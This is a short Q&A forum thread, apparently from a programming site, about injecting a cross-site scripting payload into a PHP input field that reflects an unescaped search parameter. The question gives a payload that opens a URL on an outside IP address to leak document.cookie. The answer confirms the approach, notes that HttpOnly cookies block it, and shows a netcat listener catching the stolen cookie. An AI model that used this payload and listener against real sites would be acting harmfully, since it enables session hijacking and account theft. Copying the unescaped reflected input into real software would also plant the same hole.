# XSS without angle brackets

Tags: xss

I would like to run the following script inside an input tag when the page loads.
I know how this can be fixed by using onfocus and autofocus.
But how do I get the expression `document.cookie` in there?

```
window.open('http://10.80.2.50:8000/hello.php?leak='+document.cookie);
```

My situation:

```
<input type="text" class="form-control" id="search" name="search" value="$_GET['search']" placeholder="keyword" required="">
```

Comment: why can't you just do it?

Comment: Have you tried it? What is the result? As it stands "how do I get it in there?" is unanswerable.

Answer (score 1):

You're code looks right, but it's possible that the cookies you're trying to access are HttpOnly which would not let you access them via javascript.

## Confirm in Console

1. `document.cookie` should return `""`
2. `document.cookie = "username=John Doe";`  to set a random cookie value.
3. `document.cookie` should return `"username=John Doe"`
4. Try your code and see if you get the `John Doe` cookie.

## Receive Data

Easiest way to receive the exfiltrated data is with Netcat, see below.

```
% nc -l 8000
GET /hello.php?leak=username=John%20Doe HTTP/1.1
Host: 127.0.0.1:8080
...
```